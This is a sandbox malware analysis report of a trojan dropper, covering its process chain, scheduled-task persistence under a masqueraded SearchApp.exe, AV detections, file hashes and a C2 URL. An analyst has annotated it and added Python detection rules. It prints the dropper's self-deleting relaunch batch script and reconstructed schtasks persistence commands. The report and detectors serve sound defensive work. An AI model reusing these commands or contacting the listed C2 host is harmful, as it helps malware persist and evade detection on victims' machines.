Source: C:\Users\user\Desktop\j0GOUGjcJD.exe - Code function: 0_2_004F866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe - Code function: 0_2_004EEF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\winSaves\fontsavesbroker.exe - Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe - Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\winSaves\0VySiddKAXOECI1ul.vbe"
Source: C:\Windows\SysWOW64\wscript.exe - Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\winSaves\UEmczQViUsQALT5sK5Im3o.bat" "
Source: C:\Windows\SysWOW64\cmd.exe - Process created: C:\winSaves\fontsavesbroker.exe "C:\winSaves\fontsavesbroker.exe"
Source: C:\winSaves\fontsavesbroker.exe - Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\vxPvY9xhrB.bat"
Source: C:\Windows\System32\cmd.exe - Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe - Process created: C:\winSaves\fontsavesbroker.exe "C:\winSaves\fontsavesbroker.exe"
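The six "Process created" lines above are the execution chain: the SFX starts wscript.exe on a .vbe dropped to C:\winSaves, the script runs a .bat from the same directory, the batch starts fontsavesbroker.exe, which writes a second .bat to %TEMP% that calls w32tm /stripchart against localhost (a portable few-second sleep) and then relaunches fontsavesbroker.exe. As an added example, not code from the report or from the sample, the rules below encode that chain over Sysmon-style process-creation events. The events are constructed from the lines above, except the schtasks event, which is a reconstruction shaped after the Task Scheduler timeline in this report (the report does not show the schtasks command line); the field names and the directory lists are the author's assumptions.

```python
"""Detection rules for the execution chain this report records.

Added example, not code from the Joe Sandbox report or from the sample. The events at
the bottom are constructed to mirror the report's 'Process created' lines; the schtasks
event is a reconstruction shaped after the report's Task Scheduler timeline (the report
does not show that command line). Field names and directory lists are assumptions.
"""
import ntpath
import re

# Top-level directories a program or script is expected to run from (lower-case).
STANDARD_ROOT_DIRS = {"windows", "program files", "program files (x86)", "programdata", "users"}
# Data-only subdirectories of %SystemRoot%; a task target or dropped executable there
# (C:\Windows\Cursors\SearchApp.exe in this report) is masquerading.
DATA_ONLY_WINDIR_SUBDIRS = {"cursors", "fonts", "help", "media", "temp", "tasks"}

_SCRIPT_RE = re.compile(r'"([^"]+\.(?:vbe|vbs|jse|js|wsf))"|(\S+\.(?:vbe|vbs|jse|js|wsf))')
_TR_RE = re.compile(r'/tr\s+(?:"([^"]+)"|(\S+))')


def _norm(path):
    """Lower-case, strip quotes, backslash separators."""
    return path.strip().strip('"').replace("/", "\\").lower()


def _root_dir(path):
    """First directory under the drive letter ('winsaves' for C:/winSaves/x.exe), '' if not drive-rooted."""
    parts = _norm(path).split("\\")
    return parts[1] if len(parts) > 2 and parts[0].endswith(":") else ""


def _basename(path):
    return ntpath.basename(_norm(path))


def rule_script_host_nonstandard_root(ev):
    """wscript/cscript running a script stored outside the standard top-level dirs."""
    if _basename(ev["image"]) not in ("wscript.exe", "cscript.exe"):
        return False
    m = _SCRIPT_RE.search(ev["cmdline"].lower())
    root = _root_dir(m.group(1) or m.group(2)) if m else ""
    return root != "" and root not in STANDARD_ROOT_DIRS


def rule_w32tm_localhost_delay(ev):
    """w32tm /stripchart against localhost: a sleep primitive batch droppers use before
    relaunching their payload (here spawned by the cmd.exe running the .bat in %TEMP%)."""
    if _basename(ev["image"]) != "w32tm.exe":
        return False
    cl = ev["cmdline"].lower()
    return "/stripchart" in cl and re.search(r"/computer:(localhost|127\.0\.0\.1)", cl) is not None


def rule_schtasks_target_in_odd_location(ev):
    """schtasks /create whose /tr target sits in a data-only %SystemRoot% subdirectory
    or under a top-level directory Windows does not create."""
    if _basename(ev["image"]) != "schtasks.exe":
        return False
    cl = ev["cmdline"].lower()
    m = _TR_RE.search(cl) if "/create" in cl else None
    if not m:
        return False
    target = _norm(m.group(1) or m.group(2))
    parts = target.split("\\")
    in_windir = len(parts) > 3 and parts[0].endswith(":") and parts[1] == "windows"
    if in_windir and parts[2] in DATA_ONLY_WINDIR_SUBDIRS:
        return True
    root = _root_dir(target)
    return root != "" and root not in STANDARD_ROOT_DIRS


def rule_exe_from_nonstandard_root_via_batch(ev):
    """An .exe under a non-standard top-level directory started by cmd.exe running a .bat."""
    root = _root_dir(ev["image"])
    if not _norm(ev["image"]).endswith(".exe") or root == "" or root in STANDARD_ROOT_DIRS:
        return False
    return _basename(ev["parent_image"]) == "cmd.exe" and ".bat" in ev["parent_cmdline"].lower()


RULES = {
    "script_host_nonstandard_root": rule_script_host_nonstandard_root,
    "w32tm_localhost_delay": rule_w32tm_localhost_delay,
    "schtasks_target_odd_location": rule_schtasks_target_in_odd_location,
    "exe_from_nonstandard_root_via_batch": rule_exe_from_nonstandard_root_via_batch,
}


def evaluate(events):
    """Return (event index, rule name) for every rule that fires, in event order."""
    return [(i, name) for i, ev in enumerate(events) for name, rule in RULES.items() if rule(ev)]


def _ev(image, cmdline, parent_image, parent_cmdline):
    return {"image": image, "cmdline": cmdline, "parent_image": parent_image, "parent_cmdline": parent_cmdline}


# Constructed events: 0-3 mirror the report, 4 is the reconstructed schtasks call, 5-6 are benign controls.
SAMPLE_EVENTS = [
    _ev(r"C:\Windows\SysWOW64\wscript.exe", r'"C:\Windows\System32\WScript.exe" "C:\winSaves\0VySiddKAXOECI1ul.vbe"',
        r"C:\Users\user\Desktop\j0GOUGjcJD.exe", r'"C:\Users\user\Desktop\j0GOUGjcJD.exe"'),
    _ev(r"C:\Windows\SysWOW64\cmd.exe", r'C:\Windows\system32\cmd.exe /c ""C:\winSaves\UEmczQViUsQALT5sK5Im3o.bat" "',
        r"C:\Windows\SysWOW64\wscript.exe", r'"C:\Windows\System32\WScript.exe" "C:\winSaves\0VySiddKAXOECI1ul.vbe"'),
    _ev(r"C:\winSaves\fontsavesbroker.exe", r'"C:\winSaves\fontsavesbroker.exe"',
        r"C:\Windows\SysWOW64\cmd.exe", r'C:\Windows\system32\cmd.exe /c ""C:\winSaves\UEmczQViUsQALT5sK5Im3o.bat" "'),
    _ev(r"C:\Windows\System32\w32tm.exe", r"w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2",
        r"C:\Windows\System32\cmd.exe", r'"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\vxPvY9xhrB.bat"'),
    _ev(r"C:\Windows\System32\schtasks.exe", r'schtasks /create /tn "SearchApp" /tr "C:\Windows\Cursors\SearchApp.exe" /sc onlogon /f',
        r"C:\winSaves\fontsavesbroker.exe", r'"C:\winSaves\fontsavesbroker.exe"'),
    _ev(r"C:\Windows\System32\wscript.exe", r'"C:\Windows\System32\wscript.exe" "C:\ProgramData\Scripts\logon.vbs"',
        r"C:\Windows\explorer.exe", r"C:\Windows\explorer.exe"),
    _ev(r"C:\Windows\System32\schtasks.exe", r'schtasks /create /tn "Backup" /tr "C:\Program Files\Vendor\backup.exe" /sc daily',
        r"C:\Windows\System32\cmd.exe", r'"C:\Windows\System32\cmd.exe" /c install.bat'),
]

if __name__ == "__main__":
    for i, name in evaluate(SAMPLE_EVENTS):
        print(f"event {i}: {name}: {SAMPLE_EVENTS[i]['cmdline']}")
```

Each rule is deliberately narrow enough to survive on a real estate: logon scripts under C:\ProgramData and vendor installers under C:\Program Files (the two control events) stay quiet, while the four stages the report shows each trip exactly one rule. The w32tm rule is the cheapest of the four to deploy and the one most specific to this dropper family's batch stage.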
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe - Code function: 0_2_004EED5B cpuid
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe - Code function: 0_2_004EA63C GetLocaleInfoW,GetNumberFormatW
Source: C:\winSaves\fontsavesbroker.exe - Queries volume information: C:\winSaves\fontsavesbroker.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe - Queries volume information: C:\ VolumeInformation
Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe - Queries volume information: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe VolumeInformation
Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe - Queries volume information: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe VolumeInformation
Source: C:\winSaves\fontsavesbroker.exe - Queries volume information: C:\winSaves\fontsavesbroker.exe VolumeInformation
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe - Code function: 0_2_004ED5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle
Source: C:\Users\user\Desktop\j0GOUGjcJD.exe - Code function: 0_2_004DACF5 GetVersionExW
Source: C:\Windows\SysWOW64\wscript.exe - Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match - File source: 00000010.00000002.1890656655.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match - File source: 00000011.00000002.1891516685.000000000303E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match - File source: 00000010.00000002.1890656655.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match - File source: 00000013.00000002.1933324919.0000000002A65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match - File source: 00000013.00000002.1933324919.0000000002A98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match - File source: 00000010.00000002.1890656655.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match - File source: 00000004.00000002.1802058996.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match - File source: 00000004.00000002.1802058996.0000000002EE3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match - File source: 00000011.00000002.1891516685.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match - File source: Process Memory Space: fontsavesbroker.exe PID: 2332, type: MEMORYSTR
Source: Yara match - File source: Process Memory Space: TGdhCspOsuwHWHVRmOneCNdUUqTS.exe PID: 6420, type: MEMORYSTR
Source: Yara match - File source: Process Memory Space: TGdhCspOsuwHWHVRmOneCNdUUqTS.exe PID: 4456, type: MEMORYSTR
Source: Yara match - File source: Process Memory Space: fontsavesbroker.exe PID: 4592, type: MEMORYSTR

Remote Access Functionality

Source: Yara match - File source: 00000010.00000002.1890656655.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match - File source: 00000011.00000002.1891516685.000000000303E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match - File source: 00000010.00000002.1890656655.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match - File source: 00000013.00000002.1933324919.0000000002A65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match - File source: 00000013.00000002.1933324919.0000000002A98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match - File source: 00000010.00000002.1890656655.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match - File source: 00000004.00000002.1802058996.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match - File source: 00000004.00000002.1802058996.0000000002EE3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match - File source: 00000011.00000002.1891516685.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match - File source: Process Memory Space: fontsavesbroker.exe PID: 2332, type: MEMORYSTR
Source: Yara match - File source: Process Memory Space: TGdhCspOsuwHWHVRmOneCNdUUqTS.exe PID: 6420, type: MEMORYSTR
Source: Yara match - File source: Process Memory Space: TGdhCspOsuwHWHVRmOneCNdUUqTS.exe PID: 4456, type: MEMORYSTR
Source: Yara match - File source: Process Memory Space: fontsavesbroker.exe PID: 4592, type: MEMORYSTR
MITRE ATT&CK Matrix (rows as laid out in the report; the digits in front of a technique are the report's match badges, kept as extracted)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 11 Scripting | Valid Accounts | 11 Windows Management Instrumentation | 1 Scheduled Task/Job | 11 Process Injection | 21 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 11 Scripting | 1 Scheduled Task/Job | 1 Disable or Modify Tools | LSASS Memory | 121 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 1 DLL Side-Loading | 1 DLL Side-Loading | 31 Virtualization/Sandbox Evasion | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 1 Native API | Login Hook | Login Hook | 11 Process Injection | NTDS | 31 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Obfuscated Files or Information | Cached Domain Credentials | 3 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 21 Software Packing | DCSync | 37 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Behavior Graph ID: 1524358; Sample: j0GOUGjcJD.exe; Start date: 02/10/2024; Architecture: WINDOWS; Score: 100
Graph-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for dropped file; 10 other signatures
Process tree recovered from the graph's text (numbers after a process are the graph's per-process badges, which the report's legend defines as the number of created registry values and created files; signatures attached to a node are in brackets):

j0GOUGjcJD.exe (3 6)
  dropped: C:\winSaves\fontsavesbroker.exe (PE32); C:\winSaves\0VySiddKAXOECI1ul.vbe (data)
  +- wscript.exe (1)  [Windows Scripting host queries suspicious COM object (likely to drop second stage)]
     +- cmd.exe (1)
        +- conhost.exe
        +- fontsavesbroker.exe (3 10)  [Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 2 other signatures]
           dropped: C:\...\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe (PE32); C:\Windows\Cursors\SearchApp.exe (PE32); C:\Users\user\AppData\...\vxPvY9xhrB.bat (DOS)
           +- cmd.exe (1)
           |  +- w32tm.exe (1)
           |  +- conhost.exe
           |  +- fontsavesbroker.exe
           +- schtasks.exe
           +- schtasks.exe
           +- 4 other processes
TGdhCspOsuwHWHVRmOneCNdUUqTS.exe (3)  [Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file]
TGdhCspOsuwHWHVRmOneCNdUUqTS.exe (2)

Antivirus detection, submitted sample (Source | Detection | Scanner | Label):
j0GOUGjcJD.exe | 74% | ReversingLabs | ByteCode-MSIL.Trojan.ZmutzyLscpt
j0GOUGjcJD.exe | 100% | Avira | VBS/Runner.VPG
j0GOUGjcJD.exe | 100% | Joe Sandbox ML |

Antivirus detection, dropped files (Source | Detection | Scanner | Label):
C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe | 100% | Avira | HEUR/AGEN.1323984
C:\winSaves\0VySiddKAXOECI1ul.vbe | 100% | Avira | VBS/Runner.VPG
C:\Users\user\AppData\Local\Temp\vxPvY9xhrB.bat | 100% | Avira | BAT/Delbat.C
C:\Windows\Cursors\SearchApp.exe | 100% | Avira | HEUR/AGEN.1323984
C:\winSaves\fontsavesbroker.exe | 100% | Avira | HEUR/AGEN.1323984
C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe | 100% | Joe Sandbox ML |
C:\Windows\Cursors\SearchApp.exe | 100% | Joe Sandbox ML |
C:\winSaves\fontsavesbroker.exe | 100% | Joe Sandbox ML |
C:\Windows\Cursors\SearchApp.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.Jalapeno
C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.Jalapeno
C:\winSaves\fontsavesbroker.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.Jalapeno

No Antivirus matches
No Antivirus matches

Antivirus detection, URLs (Source | Detection | Scanner | Label):
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe

No contacted domains info

URLs (Name | Malicious | Antivirus Detection | Reputation):
http://ch67763.tw1.ru/@==gbJBzYuFDT | true | | unknown

URLs from memory and binaries (Name | Source | Malicious | Antivirus Detection | Reputation):
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | fontsavesbroker.exe, 00000004.00000002.1802058996.0000000002F04000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown

No contacted IP infos

The one URL flagged malicious is the only candidate for the C2 the "C2 URLs / IPs found in malware configuration" signature refers to; its host, ch67763.tw1.ru, is also listed among the domains excluded from analysis in the cookbook comments below, so the empty contacted-domain and contacted-IP tables say nothing about whether the sample attempted to reach it. The schemas.xmlsoap.org URL is a WS-Federation claim-type identifier that any .NET binary referencing System.IdentityModel carries, not an indicator.
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1524358
Start date and time: 2024-10-02 17:53:02 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 47s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 23
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: j0GOUGjcJD.exe (renamed because the original name is a hash value)
Original Sample Name: 2b577aea211c0031d052f521c6d5c0ec.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@24/12@0/0
EGA Information:
• Successful, ratio: 20%
HCA Information:
• Successful, ratio: 77%
• Number of executed functions: 374
• Number of non-executed functions: 101
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, SearchApp.exe
• Excluded domains from analysis (whitelisted): ch67763.tw1.ru, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target TGdhCspOsuwHWHVRmOneCNdUUqTS.exe, PID 4456 because it is empty
• Execution Graph export aborted for target TGdhCspOsuwHWHVRmOneCNdUUqTS.exe, PID 6420 because it is empty
• Execution Graph export aborted for target fontsavesbroker.exe, PID 2332 because it is empty
• Execution Graph export aborted for target fontsavesbroker.exe, PID 4592 because it is empty
• Not all processes were analysed; the report is missing behavior information
• Report size exceeded maximum capacity and may be missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtProtectVirtualMemory calls found
• Report size getting too big, too many NtQueryValueKey calls found
• VT rate limit hit for: j0GOUGjcJD.exe

Two of the whitelist entries matter for reading this report. The process whitelist is a list of file names and includes SearchApp.exe, which is exactly the name the dropper reuses for C:\Windows\Cursors\SearchApp.exe and registers in two scheduled tasks, so any run of that copy would fall outside the recorded behavior. The domain whitelist includes ch67763.tw1.ru, the host of the URL the report marks malicious, so C2 contact would not appear in the contacted-domain or contacted-IP tables.
              Time | Type | Description
              16:54:06 | Task Scheduler | Run new task: SearchApp path: "C:\Windows\Cursors\SearchApp.exe"
              16:54:06 | Task Scheduler | Run new task: SearchAppS path: "C:\Windows\Cursors\SearchApp.exe"
              16:54:06 | Task Scheduler | Run new task: TGdhCspOsuwHWHVRmOneCNdUUqTS path: "C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe"
              16:54:07 | Task Scheduler | Run new task: TGdhCspOsuwHWHVRmOneCNdUUqTST path: "C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe"
              Process:C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe
              File Type:CSV text
              Category:dropped
              Size (bytes):1281
              Entropy (8bit):5.370111951859942
              Encrypted:false
              SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
              MD5:12C61586CD59AA6F2A21DF30501F71BD
              SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
              SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
              SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
              Malicious:false
              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
              Process:C:\winSaves\fontsavesbroker.exe
              File Type:CSV text
              Category:dropped
              Size (bytes):1740
              Entropy (8bit):5.36827240602657
              Encrypted:false
              SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkhHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkhtpaqZ4x
              MD5:B28E0CCD25623D173B2EB29F3A99B9DD
              SHA1:070E4C4A7F903505259E41AFDF7873C31F90D591
              SHA-256:3A108902F93EF9E952D9E748207778718A2CBAEB0AB39C41BD37E9BB0B85BF3A
              SHA-512:17F5FBF18EE0058F928A4D7C53AA4B1191BA3110EDF8E853F145D720381FCEA650A3C997E3D56597150149771E14C529F1BDFDC4A2BBD3719336259C4DD8B342
              Malicious:false
              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
              Process:C:\winSaves\fontsavesbroker.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):25
              Entropy (8bit):4.243856189774723
              Encrypted:false
              SSDEEP:3:7Ux6RgBdc+n:q3rZn
              MD5:4E08BA54A77F093123115E61CC7FA128
              SHA1:3B7FBE82F6C75471F1BB764E8050C624E6E39122
              SHA-256:365FA36BEAD943817F54E070221646A24C51DB53D4B340185035DFC119AE617B
              SHA-512:D1890CD910827AFC853B141D1C954A7A8012D124AE9553DB30D5A9E31725773DFBF3867D393B33AB43CB942FBDBEA0C7D9A8EAC0DBA30424891E2DC8A6F4355D
              Malicious:false
              Preview:sH3Flnpa516XT6uWzuEFXxyKT
              Process:C:\winSaves\fontsavesbroker.exe
              File Type:DOS batch file, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):196
              Entropy (8bit):5.052718018254349
              Encrypted:false
              SSDEEP:6:hITg3Nou11r+DEhM0sKOZG1wkn23fj1FG:OTg9YDEh7WfL1c
              MD5:D8ADD36E073FCDA4A0DEE2F64D35B5A7
              SHA1:2DB7BF2C3715A456330D86D7FA8EFA8E630A3403
              SHA-256:49006DEA649DECE06A1C2A024F30F89891FEBCC13B82228B90FFF670C9964B6A
              SHA-512:8CB94806A14E45AB5245B3C2D9EAAF6C6DE06AC29059704565E3A79A9D13254BD21BFD5400DA7A722DAAE4A7080F907DCC378A2CE5BDDCA07D3A004EC3FCDB86
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              Preview:@echo off..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\winSaves\fontsavesbroker.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\vxPvY9xhrB.bat"
              Process:C:\winSaves\fontsavesbroker.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):103
              Entropy (8bit):5.608261206542817
              Encrypted:false
              SSDEEP:3:8R1GegEnZxwAGe0JXunqiKsWMUwqpT1q:qGIZK5LJYqlsWPwqpTg
              MD5:13E3321880AE371DB8062EDDC6DF36AA
              SHA1:09FD0093B080F99E695ED9492366AE1B4B039670
              SHA-256:92D1CDC9EA7F3FF54247DC3AFA7CDB3383E0FDB126C9ADCD7981D31F4C71DEB3
              SHA-512:EC4B6B2D9CB0D288ADAF72CB6B630A789EFF9BD0609525CAF3CC0C20C6EBCBCE2D9FB07E385E2128B0FCDAAC72E140A5B9FC39B30534BA2212350A6FDABB6E10
              Malicious:false
              Preview:qP8v8PN7mmlg1oIatdTnnyVXz724KGgg7CDuuhV2Y8dDKQ1yLCCB1dc23k5BXSxfGEiykXpMIbOoUSNiGDsHEfpekL0KlUeFL86FrDO
              Process:C:\winSaves\fontsavesbroker.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):847872
              Entropy (8bit):6.080640642128486
              Encrypted:false
              SSDEEP:12288:8DTblYiD2UQavcM7pokcJJgyJrQEi20MeIl2JPpTK8R+TBP:4lYiD2UQCmkcJJ1iul2LTK8R+TBP
              MD5:173D5AC0A5C8FBF0A3990DFD33A329B5
              SHA1:479DD85A5921FA5D0DE0CD164FCC626791634ADE
              SHA-256:57FB0DEF3DF546AA3FC26CA768A66BB79F120BACE0ED7474E0C65003CF96DC12
              SHA-512:558CE6EB0ACA76EF003DE2A19ECE63F4B5854BF927DECCBBF939A4ABE4F8233B155D839892837261FAC2B2A71B33BA25D456F776144C3980F076ECD9A64D7BEE
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 88%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Users\user\Desktop\j0GOUGjcJD.exe
              File Type:data
              Category:dropped
              Size (bytes):208
              Entropy (8bit):5.795274789439553
              Encrypted:false
